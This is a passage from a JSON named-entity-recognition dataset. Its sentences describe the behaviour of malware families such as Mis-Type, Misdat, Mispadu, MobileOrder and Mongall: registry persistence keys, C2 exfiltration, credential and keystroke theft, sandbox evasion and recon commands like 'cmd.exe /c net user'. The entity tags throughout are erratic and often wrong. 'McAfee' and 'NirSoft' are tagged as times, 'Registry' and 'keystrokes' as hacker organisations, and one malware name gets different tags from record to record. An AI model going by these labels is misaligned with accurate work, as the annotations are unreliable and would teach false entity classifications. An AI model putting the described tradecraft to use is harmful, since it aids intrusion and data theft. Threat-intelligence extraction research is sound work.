"O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MiniDuke", - "uses", - "HTTP", - "and", - "HTTPS", - "for", - "command", - "and", - "control." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MirageFox", - "is", - "likely", - "loaded", - "via", - "DLL", - "hijacking", - "into", - "a", - "legitimate", - "McAfee", - "binary." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "O", - "O", - "B-Time", - "O" - ] - }, - { - "tokens": [ - "MirageFox", - "has", - "a", - "function", - "for", - "decrypting", - "data", - "containing", - "C2", - "configuration", - "information." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MirageFox", - "can", - "collect", - "CPU", - "and", - "architecture", - "information", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MirageFox", - "can", - "gather", - "the", - "username", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MirageFox", - "has", - "the", - "capability", - "to", - "execute", - "commands", - "using", - "cmd.exe." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Mis-Type", - "has", - "created", - "registry", - "keys", - "for", - "persistence,", - "including", - "`HKCU\\Software\\bkfouerioyou`,", - "`HKLM\\SOFTWARE\\Microsoft\\Active", - "Setup\\Installed", - "Components\\{6afa8072-b2b1-31a8-b5c1-{Unique", - "Identifier}`,", - "and", - "`HKLM\\SOFTWARE\\Microsoft\\Active", - "Setup\\Installed", - "Components\\{3BF41072-B2B1-31A8-B5C1-{Unique", - "Identifier}`." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mis-Type", - "has", - "collected", - "files", - "and", - "data", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mis-Type", - "has", - "transmitted", - "collected", - "files", - "and", - "data", - "to", - "its", - "C2", - "server." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mis-Type", - "first", - "attempts", - "to", - "use", - "a", - "Base64-encoded", - "network", - "protocol", - "over", - "a", - "raw", - "TCP", - "socket", - "for", - "C2,", - "and", - "if", - "that", - "method", - "fails,", - "falls", - "back", - "to", - "a", - "secondary", - "HTTP-based", - "protocol", - "to", - "communicate", - "to", - "an", - "alternate", - "C2", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mis-Type", - "has", - "downloaded", - "additional", - "malware", - "and", - "files", - "onto", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mis-Type", - "may", - "create", - "a", - "file", - "containing", - "the", - "results", - "of", - "the", - "command", - "<code>cmd.exe", - "/c", - "net", - "user", - "{Username}</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mis-Type", - "may", - "create", - "a", - "temporary", - "user", - "on", - "the", - "system", - "named", - "`Lost_{Unique", - "Identifier}`." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mis-Type", - "has", - "temporarily", - "stored", - "collected", - "information", - "to", - "the", - "files", - "`“%AppData%\\{Unique", - "Identifier}\\HOSTRURKLSR”`", - "and", - "`“%AppData%\\{Unique", - "Identifier}\\NEWERSSEMP”`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mis-Type", - "saves", - "itself", - "as", - "a", - "file", - "named", - "`msdtc.exe`,", - "which", - "is", - "also", - "the", - "name", - "of", - "the", - "legitimate", - "Microsoft", - "Distributed", - "Transaction", - "Coordinator", - "service", - "binary." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "O", - "O" - ] - }, - { - "tokens": [ - "Mis-Type", - "has", - "used", - "Windows", - "API", - "calls,", - "including", - "`NetUserAdd`", - "and", - "`NetUserDel`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Mis-Type", - "network", - "traffic", - "can", - "communicate", - "over", - "a", - "raw", - "socket." - ], - "ner_tags": [ - "B-Way", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mis-Type", - "has", - "been", - "injected", - "directly", - "into", - "a", - "running", - "process,", - "including", - "`explorer.exe`." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Mis-Type", - "uses", - "Base64", - "encoding", - "for", - "C2", - "traffic." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "initial", - "beacon", - "packet", - "for", - "Mis-Type", - "contains", - "the", - "operating", - "system", - "version", - "and", - "file", - "system", - "of", - "the", - "victim." - ], - "ner_tags": [ - "O", - "O", - "I-Way", - "I-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mis-Type", - "may", - "create", - "a", - "file", - "containing", - "the", - "results", - "of", - "the", - "command", - "<code>cmd.exe", - "/c", - "ipconfig", - "/all</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Mis-Type", - "runs", - "tests", - "to", - "determine", - "the", - "privilege", - "level", - "of", - "the", - "compromised", - "user." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mis-Type", - "network", - "traffic", - "can", - "communicate", - "over", - "HTTP." - ], - "ner_tags": [ - "B-Way", - "I-Way", - "I-Way", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Mis-Type", - "has", - "used", - "`cmd.exe`", - "to", - "run", - "commands", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Misdat", - "has", - "created", - "registry", - "keys", - "for", - "persistence,", - "including", - "`HKCU\\Software\\dnimtsoleht\\StubPath`,", - "`HKCU\\Software\\snimtsOleht\\StubPath`,", - "`HKCU\\Software\\Backtsaleht\\StubPath`,", - "`HKLM\\SOFTWARE\\Microsoft\\Active", - "Setup\\Installed.", - "Components\\{3bf41072-b2b1-21c8-b5c1-bd56d32fbda7}`,", - "and", - "`HKLM\\SOFTWARE\\Microsoft\\Active", - "Setup\\Installed", - "Components\\{3ef41072-a2f1-21c8-c5c1-70c2c3bc7905}`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Misdat", - "is", - "capable", - "of", - "deleting", - "Registry", - "keys", - "used", - "for", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Misdat", - "has", - "collected", - "files", - "and", - "data", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Misdat", - "has", - "uploaded", - "files", - "and", - "data", - "to", - "its", - "C2", - "servers." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Misdat", - "is", - "capable", - "of", - "deleting", - "the", - "backdoor", - "file." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Features", - "I-Features", - "B-HackOrg", - "B-Features" - ] - }, - { - "tokens": [ - "Misdat", - "is", - "capable", - "of", - "running", - "commands", - "to", - "obtain", - "a", - "list", - "of", - "files", - "and", - "directories,", - "as", - "well", - "as", - "enumerating", - "logical", - "drives." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Misdat", - "is", - "capable", - "of", - "downloading", - "files", - "from", - "the", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Misdat", - "saves", - "itself", - "as", - "a", - "file", - "named", - "`msdtc.exe`,", - "which", - "is", - "also", - "the", - "name", - "of", - "the", - "legitimate", - "Microsoft", - "Distributed", - "Transaction", - "Coordinator", - "service", - "binary." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "B-Org", - "O", - "O" - ] - }, - { - "tokens": [ - "Misdat", - "has", - "used", - "Windows", - "APIs,", - "including", - "`ExitWindowsEx`", - "and", - "`GetKeyboardType`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Misdat", - "network", - "traffic", - "communicates", - "over", - "a", - "raw", - "socket." - ], - "ner_tags": [ - "B-Org", - "B-OffAct", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Misdat", - "was", - "typically", - "packed", - "using", - "UPX." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Misdat", - "network", - "traffic", - "is", - "Base64-encoded", - "plaintext." - ], - "ner_tags": [ - "B-Way", - "I-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "initial", - "beacon", - "packet", - "for", - "Misdat", - "contains", - "the", - "operating", - "system", - "version", - "of", - "the", - "victim." - ], - "ner_tags": [ - "O", - "O", - "I-Way", - "I-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Misdat", - "has", - "attempted", - "to", - "detect", - "if", - "a", - "compromised", - "host", - "had", - "a", - "Japanese", - "keyboard", - "via", - "the", - "Windows", - "API", - "call", - "`GetKeyboardType`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Many", - "Misdat", - "samples", - "were", - "programmed", - "using", - "Borland", - "Delphi,", - "which", - "will", - "mangle", - "the", - "default", - "PE", - "compile", - "timestamp", - "of", - "a", - "file." - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Misdat", - "is", - "capable", - "of", - "providing", - "shell", - "functionality", - "to", - "the", - "attacker", - "to", - "execute", - "commands." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mispadu", - "contains", - "a", - "copy", - "of", - "the", - "OpenSSL", - "library", - "to", - "encrypt", - "C2", - "traffic." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mispadu", - "utilizes", - "malicious", - "Google", - "Chrome", - "browser", - "extensions", - "to", - "steal", - "financial", - "data." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Mispadu", - "can", - "monitor", - "browser", - "activity", - "for", - "online", - "banking", - "actions", - "and", - "display", - "full-screen", - "overlay", - "images", - "to", - "block", - "user", - "access", - "to", - "the", - "intended", - "site", - "or", - "present", - "additional", - "data", - "fields." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-OffAct", - "I-OffAct", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mispadu", - "has", - "the", - "ability", - "to", - "capture", - "and", - "replace", - "Bitcoin", - "wallet", - "data", - "in", - "the", - "clipboard", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "B-Way", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mispadu", - "has", - "obtained", - "credentials", - "from", - "mail", - "clients", - "via", - "NirSoft", - "MailPassView." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Time", - "O" - ] - }, - { - "tokens": [ - "Mispadu", - "can", - "steal", - "credentials", - "from", - "Google", - "Chrome." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mispadu", - "decrypts", - "its", - "encrypted", - "configuration", - "files", - "prior", - "to", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mispadu", - "uses", - "a", - "custom", - "algorithm", - "to", - "obfuscate", - "its", - "internal", - "strings", - "and", - "uses", - "hardcoded", - "keys.", - "Mispadu", - "also", - "uses", - "encoded", - "configuration", - "files", - "and", - "has", - "encoded", - "payloads", - "using", - "Base64." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mispadu", - "can", - "sends", - "the", - "collected", - "financial", - "data", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mispadu", - "searches", - "for", - "various", - "filesystem", - "paths", - "to", - "determine", - "what", - "banking", - "applications", - "are", - "installed", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mispadu", - "can", - "monitor", - "browser", - "activity", - "for", - "online", - "banking", - "actions", - "and", - "display", - "full-screen", - "overlay", - "images", - "to", - "block", - "user", - "access", - "to", - "the", - "intended", - "site", - "or", - "present", - "additional", - "data", - "fields." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-OffAct", - "I-OffAct", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mispadu", - "can", - "log", - "keystrokes", - "on", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mispadu", - "has", - "relied", - "on", - "users", - "to", - "execute", - "malicious", - "files", - "in", - "order", - "to", - "gain", - "execution", - "on", - "victim", - "machines." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mispadu", - "has", - "been", - "installed", - "via", - "MSI", - "installer." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Mispadu", - "has", - "used", - "a", - "variety", - "of", - "Windows", - "API", - "calls,", - "including", - "ShellExecute", - "and", - "WriteProcessMemory." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Mispadu", - "can", - "enumerate", - "the", - "running", - "processes", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mispadu's", - "binary", - "is", - "injected", - "into", - "memory", - "via", - "`WriteProcessMemory`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Mispadu", - "creates", - "a", - "link", - "in", - "the", - "startup", - "folder", - "for", - "persistence.", - "Mispadu", - "adds", - "persistence", - "via", - "the", - "registry", - "key", - "`HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run`." - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mispadu", - "uses", - "RunDLL32", - "for", - "execution", - "via", - "its", - "injector", - "DLL." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Mispadu", - "has", - "the", - "ability", - "to", - "capture", - "screenshots", - "on", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mispadu", - "can", - "list", - "installed", - "security", - "products", - "in", - "the", - "victim’s", - "environment." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mispadu", - "has", - "been", - "spread", - "via", - "malicious", - "links", - "embedded", - "in", - "emails." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Mispadu", - "can", - "run", - "checks", - "to", - "verify", - "if", - "it", - "is", - "running", - "within", - "a", - "virtualized", - "environments", - "including", - "Hyper-V,", - "VirtualBox", - "or", - "VMWare", - "and", - "will", - "terminate", - "execution", - "if", - "the", - "computer", - "name", - "is", - "“JOHN-PC.”" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Mispadu", - "collects", - "the", - "OS", - "version,", - "computer", - "name,", - "and", - "language", - "ID." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mispadu", - "checks", - "and", - "will", - "terminate", - "execution", - "if", - "the", - "compromised", - "system’s", - "language", - "ID", - "is", - "not", - "Spanish", - "or", - "Portuguese." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mispadu’s", - "dropper", - "uses", - "VBS", - "files", - "to", - "install", - "payloads", - "and", - "perform", - "execution." - ], - "ner_tags": [ - "B-Idus", - "B-SamFile", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mivast", - "has", - "the", - "capability", - "to", - "download", - "and", - "execute", - ".exe", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Mivast", - "creates", - "the", - "following", - "Registry", - "entry:", - "<code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Micromedia</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Mivast", - "has", - "the", - "capability", - "to", - "gather", - "NTLM", - "password", - "information." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Mivast", - "has", - "the", - "capability", - "to", - "open", - "a", - "remote", - "shell", - "and", - "run", - "basic", - "commands." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MobileOrder", - "has", - "a", - "command", - "to", - "upload", - "to", - "its", - "C2", - "server", - "victim", - "browser", - "bookmarks." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MobileOrder", - "exfiltrates", - "data", - "collected", - "from", - "the", - "victim", - "mobile", - "device." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MobileOrder", - "exfiltrates", - "data", - "to", - "its", - "C2", - "server", - "over", - "the", - "same", - "protocol", - "as", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MobileOrder", - "has", - "a", - "command", - "to", - "upload", - "to", - "its", - "C2", - "server", - "information", - "about", - "files", - "on", - "the", - "victim", - "mobile", - "device,", - "including", - "SD", - "card", - "size,", - "installed", - "app", - "list,", - "SMS", - "content,", - "contacts,", - "and", - "calling", - "history." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MobileOrder", - "has", - "a", - "command", - "to", - "download", - "a", - "file", - "from", - "the", - "C2", - "server", - "to", - "the", - "victim", - "mobile", - "device's", - "SD", - "card." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MobileOrder", - "has", - "a", - "command", - "to", - "upload", - "information", - "about", - "all", - "running", - "processes", - "to", - "its", - "C2", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MobileOrder", - "has", - "a", - "command", - "to", - "upload", - "to", - "its", - "C2", - "server", - "victim", - "mobile", - "device", - "information,", - "including", - "IMEI,", - "IMSI,", - "SIM", - "card", - "serial", - "number,", - "phone", - "number,", - "Android", - "version,", - "and", - "other", - "information." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MoleNet", - "can", - "download", - "additional", - "payloads", - "from", - "the", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MoleNet", - "can", - "use", - "PowerShell", - "to", - "set", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MoleNet", - "can", - "achieve", - "persitence", - "on", - "the", - "infected", - "machine", - "by", - "setting", - "the", - "Registry", - "run", - "key." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MoleNet", - "can", - "use", - "WMI", - "commands", - "to", - "check", - "the", - "system", - "for", - "firewall", - "and", - "antivirus", - "software." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MoleNet", - "can", - "collect", - "information", - "about", - "the", - "about", - "the", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MoleNet", - "can", - "execute", - "commands", - "via", - "the", - "command", - "line", - "utility." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MoleNet", - "can", - "perform", - "WMI", - "commands", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mongall", - "has", - "the", - "ability", - "to", - "upload", - "files", - "from", - "victim's", - "machines." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mongall", - "has", - "the", - "ability", - "to", - "decrypt", - "its", - "payload", - "prior", - "to", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mongall", - "can", - "inject", - "a", - "DLL", - "into", - "`rundll32.exe`", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "B-Way", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "Mongall", - "can", - "upload", - "files", - "and", - "information", - "from", - "a", - "compromised", - "host", - "to", - "its", - "C2", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Features", - "I-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mongall", - "can", - "download", - "files", - "to", - "targeted", - "systems." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mongall", - "has", - "relied", - "on", - "a", - "user", - "opening", - "a", - "malicious", - "document", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mongall", - "can", - "identify", - "removable", - "media", - "attached", - "to", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mongall", - "can", - "establish", - "persistence", - "with", - "the", - "auto", - "start", - "function", - "including", - "using", - "the", - "value", - "`EverNoteTrayUService`." - ], - "ner_tags": 